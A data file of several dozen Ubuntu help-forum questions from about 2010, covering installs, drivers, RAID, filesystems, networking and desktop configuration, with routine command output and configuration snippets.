8539	clean install of ubuntu server over the network ?	i have an install of ubuntu server , i was recently fooling around with it , and as all learning processes do , i messed a few things up . i would this box to be secure and reliable in the future , so i have decided to do a clean install of the system . is there a way i can do it over the network ( pcs and a router ) without having to connect a monitor , and burning the cd ? basically a network install after i completely remove the previous copy of ubuntu 10.04 ? thoughts ? please and thank you .
8544	how do you compile multiple kernels from the git repository ?	i 've been trying to identify a kernel change that has killed hibernate on my dell inspiron 600m and i 've made some good progress by checking out the kernel source from the git repository and rolling a kernel that does not have this bug ( version 2.6.28-18.60 ) . i 'm now trying to compile the next kernel in the change log ( version 2.6.28-19.61 ) but the build is failing with the error message : install fs/ntfs/ntfs.ko strip : /home/spinlock/kernel/9.04/source/debian/linux-image-2.6.28-19-core3//lib/modules/2.6.28-19-core3/kernel/fs/ntfs/ntfs.ko : file format not recognized make [ 4 ] : *** [ fs/ntfs/ntfs.ko ] error 1 make [ 3 ] : *** [ _modinst_ ] error 2 make [ 2 ] : *** [ sub-make ] error 2 make [ 1 ] : *** [ install-core3 ] error 2 make : *** [ binary-core3 ] error 2 i 've been using the instructions for rolling a kernel here and i can compile the first version but i get a failure when i try to switch to the next branch and compile from there . is there a `` make dep '' or a `` make clean '' that i might be missing in the build process ? thanks .
8545	revert to original ubuntu set of package	i 've installed ubuntu 10.04 6 months ago and then i 've added a lot of packages . now i upgraded to ubuntu 10.10 and i want to remove all the packages in order to revert to the original ubuntu 10.10 fresh install package-set.how to do that ? ? ?
8546	installing wireless drivers without internet access	( this is related to my other question ; my approach there did n't work . ) my friend has ( i 'm quite sure ) a broadcom wireless chipset . however , he does n't have any wired internet access on the machine , so his only option is to boot into windows ( he is using wubi ) and download packages there . this means we ca n't use the hardware drivers dialog to install the drivers . he ca n't fetch the repository information , so the broadcom driver packages are n't showing up in synaptic . is there any way to get wi-fi working ?
8547	distributed file synchronization	first of all i should define what i mean with `` distributed '' - i mean to have the same file copy on each associated computer . if i change the file on one machine , all other copies have to be actualized automatically . furthermore each client saves a local revision . ( i know that 's practically the same as dropbox , but dropbox does n't allow me to use my own root server and i have terabytes of space there i intend to use ) now to the problem : rsync for example can recursively synchronize folder contents . i does n't store revisions . git could act as a content tracker ( it 's not necessarily just source control ) , but it is definitely not supposed to handle large files or binaries at all . an approach like unison sounds interesting , it does n't synchronize if files are changed . it just schedules rsyncs and takes revisions . is there anything in fuse like an rsync filesystem ? - there are approaches for backups , but backups and file-sync are two very different use-cases : a backup can be scheduled at a specific time , like at night or so . a synchronization occurs if a file is changed , which is handled as an event if this really does n't exist : do you consider it being possible to have an rsyncfs like curlftpfs or sshfs , acting as a fuse mount point ?
8549	raid array rebuilt no longer mounts -- isw_ *randchars*_stripe changed	i have a raid 5 system , ich10r , on a evga classified x58 motherboard . the raid failed because of an application failure in windows 7 ( dual boot ) which forced a hard restart . i rebuilt the array using the intel matrox storage manager app in windows 7 ( all automatic ) , but now the random characters changed and my drives wo n't mount . basically the random prefix changed and now kubuntu does n't know where to look . i have labeled the volume `` stripe '' and it had : /dev/mapper/isw_bedfeijgaj_stripe # where # is the number of my partition . now the device shows up as : /dev/mapper/isw_bedfhcecfj_stripe # so i had to change all of the entries in /etc/fstab . the reason for my asking here is two fold : would there ( by default ) be any other places where the device would be listed explicitly & i should change it ? is there approach i could 've taken so that the characters would n't be random and would n't change after a rebuild ? specifically , i had to [ go through hell ] ( https : //bugs.launchpad.net/ubuntu/+source/parted/+bug/568050 ) just to get the system to boot . so i 've already exhausted my googling skills , just curious if anyone knows of unpublished settings or things i may have missed ? thanks ! ! !
8554	how can i enable double-click execution from flash drives ?	ubuntu 10.10 does not allow double-click execution of files such as binaries or python scripts if they are on a flash drive , even when the file is marked as executable . i believe it is probably a security measure new to 10.10 ; 9.10 allows double-click execution . how can i revert this behavior ?
8556	middle button on thinkpad not working with 10.10 update	i have a lenovo thinkpad and the center scrolling button is n't working with the trackpoint anymore ... it worked in prior versions of ubuntu with gpointing device settings , but not with 10.10 . now , it works when i log in , but if i close the lid to my laptop and reopen it , it no longer works . i have to log out then back in . also , i can not uninstall gpointing device settings and reinstall because of this error : there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . please report this error at http : //launchpad.net/aptdaemon/+filebug and retry . traceback ( most recent call last ) : file `` /usr/lib/python2.6/dist-packages/aptdaemon/worker.py '' , line 768 , in simulate return self._simulate_helper ( trans , status_path ) file `` /usr/lib/python2.6/dist-packages/aptdaemon/worker.py '' , line 936 , in _simulate_helper return depends , status , self._cache.required_download , \ file `` /usr/lib/python2.6/dist-packages/apt/cache.py '' , line 218 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate file for the linux-image-2.6.32-24-generic-pae package . this might mean you need to manually fix this package . any ideas ? also , the center click is working like clicking the center of a scroll button it seems . like , in chrome , clicking a link opens it in a new tab , etc . how can i fix this ? ! ===how i fixed it=== as per the answer i checked as correct i did the following steps in ubuntu 10.10 and it seemed to work . first : go to ( in terminal ) /usr/share/x11/xorg.conf.d next : create a file named ( as root ) 20-thinkpad.conf next : add the following to the file : section `` inputclass '' identifier `` trackpoint wheel emulation '' matchproduct `` tpps/2 ibm trackpoint|dualpoint stick|synaptics inc. composite touchpad / trackpoint|thinkpad usb keyboard with trackpoint|usb trackpoint pointing device|composite touchpad / trackpoint '' matchdevicepath `` /dev/input/event* '' option `` emulatewheel '' `` true '' option `` emulatewheelbutton '' `` 2 '' option `` emulate3buttons '' `` false '' option `` xaxismapping '' `` 6 7 '' option `` yaxismapping '' `` 4 5 '' endsection next : save the file lastly : reboot your computer ! ( or manually save and reboot xorg )
8560	how do i find out which repository a package comes from ?	is there a method or command which can tell from which repository a package is coming from ?
8566	errors when performing fsck on encrypted partition in recovery mode	i 'm booting in recovery mode unmount crypto partition . umount /dev/mapper/sda6_crypt and i make fsck -c /dev/mapper/sda6_crypt fsck output : fsck.lvm '' _member : not found fsck : error 2 while executing fsck.lvm2_member for /dev/mapper/sda6_crypt in crypto volume there are two crypto partitions : swap home i make : fsck -c /dev/mapper/cifrado-home fsck.ext2 : superblock invalid , trying backup blocks ... fsck.ext2 : bad magic number in super-block while trying to open /dev/mapper/cifrado/home i make : fsck -c /dev/sda6 fsck : fsck.crypto_luks : not found fsck : error 2 while executing fsck.crypto_luks for /dev/sda6
8568	can ubuntu server connect to a wpa2 encrypted wireless network ?	i 'm planning to maybe install ubuntu server on an old machine . but my question is : can i install ubuntu server on a machine and have it connect to my home network - wirelessly ? i ca n't use a cable in this case .
8570	what is http : //extras.ubuntu.com/ repository for ?	what will this repository hold ? what is policy for it ?
8571	removing the memenu	i want to remove the memenu , without removing the logout/shutdown/restart/etc . button next to it . i never use social networks , so i have no use for this function . any tips ?
8572	how do i backup my banshee listening history ?	i would like to use sites like last.fm , but because i 'm often moving from os to os , and mostly listen to music on an mp3 player , most of my listening data gets lost . is there any way i can backup banshee 's listening history , and restore it on a new install ?
8580	opening the file browser from terminal	what 's the command to open the file browser ? i want it so that i can assign a keyboard shortcut to open a specific folder .
8586	where is the gnome option to display icons in menus ?	i used to go to `` system > > preferences > > appearance > > interface '' , but i ca n't find that tab on lucid or maverick .
8590	delete confirmation missing when i hit the delete key	i 'm sick of accidentally deleting files and directories as del button is badly located on my keyboard . i would really like it if ubuntu asked me to confirm before deleting anything . is there a way to do this ?
8592	how do i align my partition table properly ?	i am in the process of building my first raid5 array . i 've used mdadm to create the following set up : root @ bondigas : ~ # mdadm -- detail /dev/md1 /dev/md1 : version : 00.90 creation time : wed oct 20 20:00:41 2010 raid level : raid5 array size : 5860543488 ( 5589.05 gib 6001.20 gb ) used dev size : 1953514496 ( 1863.02 gib 2000.40 gb ) raid devices : 4 total devices : 4 preferred minor : 1 persistence : superblock is persistent update time : wed oct 20 20:13:48 2010 state : clean , degraded , recovering active devices : 3 working devices : 4 failed devices : 0 spare devices : 1 layout : left-symmetric chunk size : 64k rebuild status : 1 % complete uuid : f6dc829e : aa29b476 : edd1ef19:85032322 ( local to host bondigas ) events : 0.12 number major minor raiddevice state 0 8 16 0 active sync /dev/sdb 1 8 32 1 active sync /dev/sdc 2 8 48 2 active sync /dev/sdd 4 8 64 3 spare rebuilding /dev/sde while that 's going i decided to format the beast with the following command : root @ bondigas : ~ # mkfs.ext4 /dev/md1p1 mke2fs 1.41.11 ( 14-mar-2010 ) /dev/md1p1 alignment is offset by 63488 bytes . this may result in very poor performance , ( re ) -partitioning suggested . filesystem label= os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=16 blocks , stripe width=48 blocks 97853440 inodes , 391394047 blocks 19569702 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=0 11945 block groups 32768 blocks per group , 32768 fragments per group 8192 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 , 23887872 , 71663616 , 78675968 , 102400000 , 214990848 writing inode tables : ^c 27/11945 root @ bondigas : ~ # ^c i am unsure what to do about `` /dev/md1p1 alignment is offset by 63488 bytes . '' and how to properly partition the disks to match so i can format it properly .
8594	authenticating samba shares with active directory users and groups	i am looking for instruction on how to configure my ubuntu 10.04 box to allow samba shares access through active directory users and groups . i have joined the ubuntu machine to my ad domain using likewise-open , however when i enable 'security = ads ' in my smb.conf i am getting access denied errors when trying to view shares in windows explorer . any sugestions ?
8598	comprehensive books on linux ?	i am using ubuntu several years , but want to really study about how linux works , and was wondering what books you recommend . thanks ! !
8600	`` key '' panel indicator missing	i 'm hoping i 'm not imagining things , but i 'm fairly sure that i saw a clean 10.04 install with a key icon displayed in the menu bar . i believe it appeared when sudo was active for updating , etc . i do n't seem to have this icon anymore , and i was wondering if it was something i removed inadvertently , or a problem because of the number of upgrades i 've done . if you know of this icon/functionality , please let me know .
8606	which are the proprietary and paid games for linux do you know - commercial games	i know only 2 games ... quake 4 and doom 3 have any others you know ? paid/proprietary games ... ( commercial games ) these type of games i would like to know ...
8610	how to make thunderbird open links in firefox ?	i 'm trying to use thunderbird again , but i ca n't make it use firefox to open links . i 'm using kde and firefox is my default browser . i tried the network.protocol-handler method but it does n't work .
8611	what 's a good 2d animation program ( an alternative for e.g . flash cs ) ?	i do n't mean the flash player here , i 'm talking about the flash program that i can make animations with . like adobe flash cs ( formerly known as macromedia flash ) . is there a program on linux that i can make animations ? i want to make a movie like animator vs animation . i used easy gif animator on windows lol it was a bit harder than flash but i 'm on linux and i 'd like to know what it has to offer . worse case scenario , what gif animators are there on linux .
8618	installing netgear wg311v3 pci adapter	i have installed ubuntu 10.10 on atom d410 desktop ( i am new to ubuntu ) . every thing is working fine except my netgear wireless wg311v3 pci adapter . is there any way to install the driver a driver for it ? or does ubuntu not support it ?
8620	use local button styles during forwarded x11 session over ssh	is it at all possible to have a forwarded x11 session be styled with something other than the default x button styles ? it does n't even appear to use my server 's actual styles seeing as both computers are running ubuntu 10.10 . however , the window on the left is from the local machine , and window on the right is forwarded via ssh -x . is there any way to change this behavior to mimic the native button style or change it at all ? thanks .
8624	ubuntu apps to match apple 's os x lion ?	i 'm writing a post about how the software updates apple sent out have been on ubuntu ( and other linux distros ) for ages ( like the app store and the new `` mission control '' feature ) from here : http : //www.apple.com/macosx/lion/ i was wondering if i can show that ubuntu has had apps to match the other two features : fullscreen apps and `` launchpad '' ? are there ? this would be useful for helping apple users switch to ubuntu also when i 'm trying to convert them ; )
8626	prevent livecd using existing swap partition	i have an existing installation with a swap partition , and i want to boot a ubuntu 10.04 desktop livecd without using the swap partition . i want to avoid using the swap partition so that i can resize it and other partitions .
8632	gui tools for apache	are there any gui tools for configuring and monitoring apache ?
8635	support for intel core 2 quad and 4gb of ram	how to set ubuntu 10.10 desktop to take advantage of a ) core 2 quad intel processor b ) 4 gb ram thanks .
8637	remote x sessions , how to discover gui applications ?	i 've started playing around with remote x sessions and really like it so far as it allows me to use gui tools to configure my server ( sometimes , i just do n't feel like editing text files ) . one thing that bothers me though , is that unlike my desktop ubuntu , i have no way to discover which application to launch for a given task . for example , on my desktop , if i want to manage users , i simply click my way to `` system / administration / users and groups '' . when i ssh -x into my remote server , the only way to launch new applications is through the command line . if i want to use the user management application , i first have to find the name of the binary , which is not always obvious to do . right now , here is how i do it : 1 ) launch the application using my local desktop menu 2 ) launch `` gnome-system-monitor '' and find the name of the binary 3 ) launch the binary from my ssh session is there any better way to do this ( apart from using a full fletched remote desktop solution as freenx ) ? for instance , is n't there any standalone application that can act as the desktop menu which i could launch from my remote x session ? update : i just found out i could launch gnome-panel remotely . it does exactly what i need ( the applications/places/system menus ) . the draw back is that it 's messy because my local applications get mixed with the remote ones .
8642	mounting ntfs as read-only	my pc have 3 ntfs partitions ( main and backups ) plus ubuntu on dual boot . i want to keep ntfs partitions available , but mounted as read-only by default , so that other users ( and accidentally even me ) do not modify them in a harmful way . i see that i ca n't change permissions for the ntfs partitions , which is understandable . if possible , i 'd like that only su could change the default permissions , so that none of the other users could modify them without switching to windows . if not possible , making ntfs unmountable would be ok too . i 'm trying to get used to linux environment and make ubuntu as my main os , and this is mostly a protective measure to avoid corrupting my windows system , as i 'll still use it quite a lot . note : i 'm aware that ntfs permissions are useless on ubuntu , but that 's fine , as all users log as admin there . edit 1 : this is my fstab # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda7 during installation uuid=4a5ff937-5220-4b4e-b994-304ba37d3448 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda8 during installation uuid=a0285d57-8247-4efe-88ca-14bee4b8630b none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 so , i 'd like to set all my 3 ntfs hds to read only ( no auto mount ) . also , please tell me where to find the /path/to/ntfs of each partition . additionally , can i comment the floppy entry ? i do n't have one anyway = ) edit 2 : relevant part of 'mount -v ' /dev/sda1 on /media/1a7099d97099bc47 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sda5 on /media/stuff type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sda6 on /media/backup type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) edit 3 : ok , so i installed pysdm ( storage device manager ) , set all my ntfs partitions as mountable my any user , and as read only , and restarted . now i ca n't mount the partitions : unprivileged user can not mount ntfs block devices using the external fuse library . either mount the volume as root , or rebuild ntfs-3g with integrated fuse support and make it setuid root . please see more information at http : //ntfs-3g.org/support.html # unprivileged after some reading it seems that mounting the partitions as su is not a good idea . so , how can i allow the mounting ( by any user ) without su ?
8644	help compiling ( need old libs )	i need to get a scientific software running but it requires older libs and i do n't want to screw my current system . i thought about using an old ubuntu version in a vm . but which would i need ? the software can be obtained here the readme says : the makefile assumes you are using wxwindows 2.4.2 , and that it is installed in /usr ( /usr/lib/ , /usr/include/wx , etc ... ) . it may , however , be in /usr/local instead ; in this case modify line 18 of the makefile appropriately . also , wxwindows 2.4.2 has conflicts with very recent versions of gtk , so you are welcome to use the most recent version of wxwindows ( 2.6.0 ) . however , this would also require changing the makefile , namely lines 16-18 . also , this new version of wxwindows splits the libraries up into different parts ; base , core , and gl . you would need to link to all these libraries . if you email me at aseem @ agarwala.org , i can send you a makefile customized to 2.6 . update : my code does n't work with 2.6 . 2.4.2 does n't compile with newer versions of g++ . so , this is a problem that i have n't had time to fix . sorry . you 're only hope is to use an older g++ .
8645	where can i find the application executables in the filesystem ?	where are executables for programs stored in ubuntu ? an application ( komodo edit ) is asking me to identify an application to be used as a web browser . i 've become used to just entering the application name as a command for situations such as these , but this scenario got me thinking . i know in windows it would just be the relevant application folder in the 'program files ' folder , but i 'm assuming things are a bit different on linux ? i thought somewhere like bin would be logical but this appears to standard linux/unix applications . where would i find the binary executable for applications stored on my system ?
8653	how to keep processes running after ending ssh session ?	let 's say i launch a bunch of processes from a ssh session . is it possible to terminate the ssh session while keeping those processes running on the remote machine ?
8659	wine for games ?	i seem to remember hearing about a special version of wine that was optimized for games . what is this wine called and where can i get it ?
8664	how to get numpad out of `` mouse emulation '' mode ?	my numeric keypad has somehow got into a `` mouse emulation '' mode where the number keys just move the mouse pointer around ( 2 = down ; 8 = up , 6 = right , etc ) . anyone know how to make it work normally again ? none of the other numpad keys work either ( i first noticed the whole thing when ctrl + รท ( numpad division sign ) no longer produced `` line comment '' in intellij idea ) . toggling num lock does n't affect this ( though the indicator led works as usual ) . i 'm using gnome on lucid lynx ( 10.4 ) .
8669	where is the end user documentation for unity ?	is there any end user documentation for the unity launcher ? failing that , is there at least something as tips & tricks or reference materials ( for example , a list of available keyboard shortcuts , etc. ) ? failing that , is there any specification and/or developer documentation from which one could derive some useful information ? i 'd especially like to have some reference about the way search works .
8677	application launcher that lets me define shortcuts ( like dragthing on os x )	i 've just switched to ubuntu 10.10 from os x , and the one thing i 'm really missing is that i previously had set up a bunch of custom keyboard shortcuts to launch applications . for example , apple-ctrl-f would launch / switch to firefox . i 've looked around , but i can only find lots of references to gnome do , which is n't what i want - i do n't want a `` type start of application name '' , launcher , but rather a `` explicitly set custom shortcuts '' one . does such a thing exist ?
8680	speed up eth0 from 10 mb/s to 100 mb/s	how can i set my eth card to 100 mb/s ? sudo ethtool eth0 settings for eth0 : supported ports : [ mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : no advertised auto-negotiation : yes link partner advertised link modes : not reported link partner advertised pause frame use : no link partner advertised auto-negotiation : no speed : 10mb/s duplex : full port : mii phyad : 1 transceiver : external auto-negotiation : on supports wake-on : g wake-on : d link detected : yes
8681	when i do a release upgrade on a system with two derivatives , do both get updated ?	let 's say i installed regular ubuntu desktop edition using the livecd . the i installed both kubuntu and unr on the same partition as ubuntu desktop , by doing : sudo apt-get install kubuntu-desktop sudo apt-get install ubuntu-netbook and they 're all version 10.04 . now , if i log on to ubuntu desktop , and perform an upgrade to version 10.10 by doing sudo do-release-upgrade , will that upgrade kubuntu and unr as well ? i 'm using kubuntu and unr as examples , but this question extends to all spin-offs . does every installed version get upgraded when i upgrade one ? or do i have to manually upgrade them individually ?
8691	what background image do you use on your terminal ?	what images/styles do you use for your terminal profile ? i 'm looking for a visual upgrade from the stock style .
8694	how to install on a netbook without a cdrom ?	i have an asus eee pc 901 that came with windows xp installed on it . does anyone know how to install ubuntu on it ? also does anyone know if ubuntu would work on it ? would it recognize the webcam , the microphone , etc ? also , how do i reinstall windows xp if something goes wrong ? is it stored on a hidden partition ? it did n't come with any software cds .
8695	nautilus keeps trying to access a folder that does n't exist	whenever i boot into ubuntu , as soon as i login , i get a dialogue window pop up that says could n't find `` /media/ [ long string here ] '' . please check the spelling and try again . '' upon looking at my /etc/fstab file i found out that long string is actually the uuid of the root partition . i also found out that exactly the same thing happens if i do nautilus -q in the terminal . i then created a folder /media/ < long string here > . now , instead of getting that error dialogue box , a regular nautilus window opens at that folder ( on both situations described above ) . it is clear that whenever the nautilus process starts ( which happens on login and on nautilus -q ) it tries to access that folder instead of starting quietly . what 's going on here , and how can i fix this ? it does n't really break anything else , it 's just annoying . edit : here is the output of ls -al /dev/disk/by-uuid/ drwxr-xr-x 2 root root 180 2010-10-21 10:02 . drwxr-xr-x 6 root root 120 2010-10-21 08:02 .. lrwxrwxrwx 1 root root 10 2010-10-21 10:02 221643331643076f - > ../../sda1 lrwxrwxrwx 1 root root 10 2010-10-21 10:02 34e5211a-ad8f-4ffe-b3f8-b70b767fd993 - > ../../sda5 lrwxrwxrwx 1 root root 10 2010-10-21 10:02 4b41a6d6-0a8b-4ece-a7c4-712901fbf7b0 - > ../../sda8 lrwxrwxrwx 1 root root 10 2010-10-21 10:02 7c1303c4-02c0-4970-b653-1c6bd78938fa - > ../../sda6 lrwxrwxrwx 1 root root 10 2010-10-21 10:02 9480de4180de2a0e - > ../../sda2 lrwxrwxrwx 1 root root 10 2010-10-21 10:02 c8c3aef2-360d-4fbc-ac31-a4e4dc57c110 - > ../../dm-0 lrwxrwxrwx 1 root root 10 2010-10-21 10:02 e08c11e3-1c5c-474c-a9d6-b7e7ba095fa7 - > ../../sda7 the fifth line of this output contains the uuid that nautilus keeps trying to open . /dev/sda8/ is my root partition . here is the output of /etc/fstab # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/home /home ext3 defaults 1 2 # / was on /dev/sda8 during installation , with uuid=4b41a6d6-0a8b-4ece-a7c4-712901fbf7b0 . /dev/sda8 / ext4 errors=remount-ro 0 1 /dev/sda6 none swap sw 0 0 as you can see i 've got an encrypted home partition , a swap , and a root partition on the fstab file . again , that uuid on the tenth line is the one nautilus keeps trying to open as /media/ < uuid > . here 's the error message i get , for reference :
8696	can not connect to google talk using empathy/pidgin after upgrading	i ca n't seem to be able to connect to google talk using either pidgin or empathy after upgrading to ubuntu 10.10 ( fresh install ) . i do not know why ... empathy just writes `` connecting ... '' forever and never connects . what can i do from there ? google talk 's web interface works just fine for me so i doubt it is a firewall issue . edit : in fact sometimes it 's able to connect ( empathy ) , it just takes a looong time ( i 'd say about 5 mins ) , longer than i am willing to wait . on the other hand , the web interface is able to connect in seconds .
8697	how can i change my keyboard layout to a modified version ?	now , my goal is to change the keyboard layout for the entire xubuntu install to my own modded version . i think the way to do this is to make an x11 keymap and load it - but as always there is a thousand ways to do things and i 'm open to suggestions . i have created a modified xkb symbols keymap that i want to use in my xubuntu installation but i ca n't see it in the list of layouts in the settings dialog . i put the following into /usr/share/x11/xkb/symbols/se partial alphanumeric_keys xkb_symbols `` psvorak '' { name [ group1 ] = '' sweden - psvorak '' ; include `` keypad ( comma ) '' include `` level3 ( ralt_switch ) '' key < ad01 > { [ odiaeresis , odiaeresis , dollar , none ] } ; < etc > } ; to no effect . i also tried to regenerate symbols.dir according to http : //www.linuxquestions.org/questions/linux-desktop-74/problem-creating-custom-xkb-layout-605568/ and while xkbcomp says there are no faults in my file , nothing else changes . it is n't available in the gui and setxkbmap ( with its very confusing syntax ) only responds with 'couldnt find file ' or 'error loading new keyboard description ' . i did manage to create a console key map and load it using loadkeys ... charset `` iso-8859-1 '' keymaps 0-2,4-6,8,12 alt_is_meta strings as usual keycode 1 = escape alt keycode 1 = meta_escape keycode 2 = one exclam alt keycode 2 = meta_one keycode 3 = two quotedbl at control keycode 3 = nul alt keycode 3 = meta_two < etc > ... but it only seems to work in the ctrl-alt-f1 console .
8698	download of a folder as a whole ?	i occasionally use ubuntu one for purchase music ; i would like to find a way to import my music from the cloud to my macbook ( which of course is not running ubuntu ) . i wonder if , for this purpouse , i must download each track individually , or if there is a way to download a whole folder ( tipically , the album ) . many thanks in advance ; )
8700	remote connection on ubuntu from windows 7	hi , i have just finish installation of desktop ubuntu 10.10 on my new machine . now i want to make remote desktop connection from my windows7 network laptop . i do n't want to connect to monitor in ubuntu machine . is there any way to do this ? i want to do - 1 . start the ubuntu machine 2 . make remote connection on ubuntu machine from win 7 laptop 3 . start working i have enabled remote connection on my ubuntu machine . thanks in advanve for help .
8701	windows 7-like snap window maximize and vertical feature	is there anything that provides functionality in gnome/compiz/ubuntu similar to window 7 's new snapping features ? this includes the following abilities : dragging a window by its title bar to the top edge of the screen maximizes the window- dragging the window away from the top restores the window to its original size dragging a window by its title bar to either edge of the screen fills that half of the monitor - fully vertically maximized and half horizontally maximized . dragging the same window away from the edge restores the window to its original size double-clicking on the vertical resize edges of any window maximizes the window vertically with its current horizontal size i 've come to really enjoy this feature of windows 7 and would love to have something identical in ubuntu .
8704	slow dns resolution	after a clean install of 10.10 i 'm finding dns resolution takes quite a long time . hitting any url takes a good few seconds ( 10 - 30 ) before the site is displayed . i 'm thinking this is a dns resolution issue due to the 'waiting ' or 'looking up ' text being displayed in firefox and chrome . i do not get this issue with slackware linux or windows 7 so it is not network or dns server specific issue . it 's something on the client side . looking around on google i see there are a few other people with this issue . the ones that have reported a workaround by switching to opendns are disabling ipv6 or dealing with another issue . any help would be appreciated . my network card is wired : broadcom corporation netlink bcm5906m fast ethernet pci express thanks
8706	what exactly happens when ubuntu recovers from crash ?	i 've experiences some configuration `` resets '' after ubuntu crashes : display configuration changed ( i 'd changing through /usr/bin/nvidia-settings ) hibernation/suspension turned on again ( i 'd disabled it ) in order to prevent those , i would like to know how exactly ubuntu recovers from crashes . background : i 'm particulary intereseted in this topic because i 've ubuntu connected to displays showing information across a public building . and it 's pretty embarassing when the display config is all messed up and sometimes going all black ( resolution not supported ) .
8709	how can i use the dictionary application in my language ?	i want to use the dictionary app ( applications > office > dictionary ) bundled with ubuntu in my own language , portuguese ( portugal ) . in the application preferences i 've the option to add alternative dictionaries , but i 've to get trough all sort of complicated and not user-friendly at all definitions . in the add dictionary windows , i 've a tab that should have the list of available dictionaries , but even after refreshing it only shows blank . so , is there an easy way to add an alternative language ( in my case , pt-pt ) to the dictionary application ? fact : please do n't suggest alternative programas . i really want to use the default application .
8710	how do i directly access the shares of a machine ?	i do n't want to navigate via the networks -- > workgroup/domain folder . i want to skip that step and directly access the share of a specific machine . for example , in windows you would type in windows explorer : \\machinename and it would open up the shares of that machine . how can i do this in ubuntu ?
8712	contents of my ~/desktop directory not actually displayed on the desktop	in my ubuntu 10.10 after configure an external crt on s-video in cloning desktop , i 've lost my desktop icon and right clicking on it does not show menu and menu bar too . i 've tried to resolve with following command : sudo apt-get install ubuntu-desktop sudo apt-get install gnome-panel sudo chown -r $ user : $ user /scrivania with following sequence of commands i 've gotten again main menu but nothing to do for get back my desktop : mkdir ~/.oldpanel mv ~/.gconf/apps/panel ~/.oldpanel gconftool-2 -- shutdown pkill gnome-panel sudo apt-get install -- reinstall ubuntu-desktop have you any idea to resolve my problem ? i 've also posted this question on : http : //unix.stackexchange.com/questions/3328/ubuntu-desktop-lost thanks in advance ciao h .
8713	rhythmbox last.fm unsupported format error	i do n't understand why i keep getting unsupported format errors when using the last.fm plugin in rhythmbox . it seems to happen every time i try to play a song only one or two tracks advanced.. if i try to play a song that 's three or more tracks ahead it works fine .
8720	equivalent to yum history ?	is there an equivalent to yum history command in ubuntu ? im aware that i can just look at the apt logs , but im looking for something that will list them all in the command line , and then enable me to target a specific installation and rollback / modify it
8726	how to enable ipv6 via miredo along with ufw ?	ubuntu provides some good information on how to enable ufw and on how to enable ipv6 with miredo : https : //wiki.ubuntu.com/uncomplicatedfirewall https : //wiki.ubuntu.com/ipv6 but what is missing is information on how to properly configure ufw to let miredo work , as as soon as i enable ufw ipv6 stops working : $ ufw disable $ ping6 ipv6.google.com ping ipv6.google.com ( 2a00:1450:8004 : :93 ) 56 data bytes 64 bytes from 2a00:1450:8004 : :93 : icmp_seq=1 ttl=56 time=1886 ms $ ufw enable $ ping6 ipv6.google.com ping ipv6.google.com ( 2a00:1450:8004 : :6a ) 56 data bytes ping : sendmsg : operation not permitted so how do i properly configure both miredo and ufw together that basic ipv6 is working , but with all other incoming traffic being blocked ?
8729	having permission problems with xampp	i installed xampp with no problems , and then ran the command to set security . apparently setting security locks you out of the directories even at the file system level , not just via ftp - when i look at the permissions tab of my htaccess folder , for example , the owner is set to the ftp username . i can ftp , but unfortunately no matter what i set my default remote directory to in my ftp program , it takes me inside my htdocs folder and wo n't let me go up one level . because this is a dev server installed on my local machine , i 'd really like to be able to move files around at the file system level through my file manager , rather than having to ftp . how can i set the permissions on the folders in question , when my actual linux username does n't have write access to the folders ? is there some way i can do it in terminal with sudo ? does the sudo command override any permissions set on a folder or file that locks out the standard user ?
8733	changing the sidepane background color in nautilus	changing the sidepane background color in nautilus is it possible to change the sidepane background color for places ? i want it to blend , if i hit the dropdown above the sidepane and select information , this blends with the navigation toolbars . i 'd like that same effect for the places option .
8740	poor boot-screen after interrupted install	my install was interrupted because of a power cut . i recovered from it , using the command sudo apt-get dist-upgrade now , i get a violet bootscreen like normal , but the progress bar is shown as 4 dots , and ubuntu is displayed in a simple font , reminiscent of the dos era . what do i do to make it right ? i have nvidia drivers . also , worth mentioning is that before showing the bootscree , i get a line of text saying : ... ... ... ... unreliable temperature sensor ... ... ... ... . i use a asus m3n78-em amd phenom ii x3 720 black edition 4gb ddr2 , nvidia 9400gt 512 mb . thanks .
8741	mounting truecrypt container on share	i have a truecrypt container on a windows share that i 'm trying to mount from ubuntu . however , i consistently get a `` permission denied '' error . i am using /home/kent/.gvfs/share on server/path/to/container as the path . i have tried mounting with the default options , mounting as read-only , and mounting to a specific directory . i get the same error regardless . if i copy the container to my local ubuntu machine then i can mount it and access it without issue . on a windows desktop , i can mount it over the network without issue . how can i mount this container from ubuntu over my network ?
8744	make w7 install as small as possible and increase ubuntu size	how do i do this all from ubuntu ? when i used wubi there was a max size , and i ended up liking ubuntu 10.04 so i kept it installed , but now i want to do just run w7 as a vm . i have around only 58gbs used and around 100gbs free , how can i move the 100gbs of just free space to ubuntu with gparted or any other software ? also , i 've tried decreasing the size of the partion in w7 with 3rd party software as well as the included one , but both ca n't decrease it at all for some reason . apparently it 's some hidden fragmented file that the defrag and partition editors ca n't get too , thats why im asking how to do it all from ubuntu ...
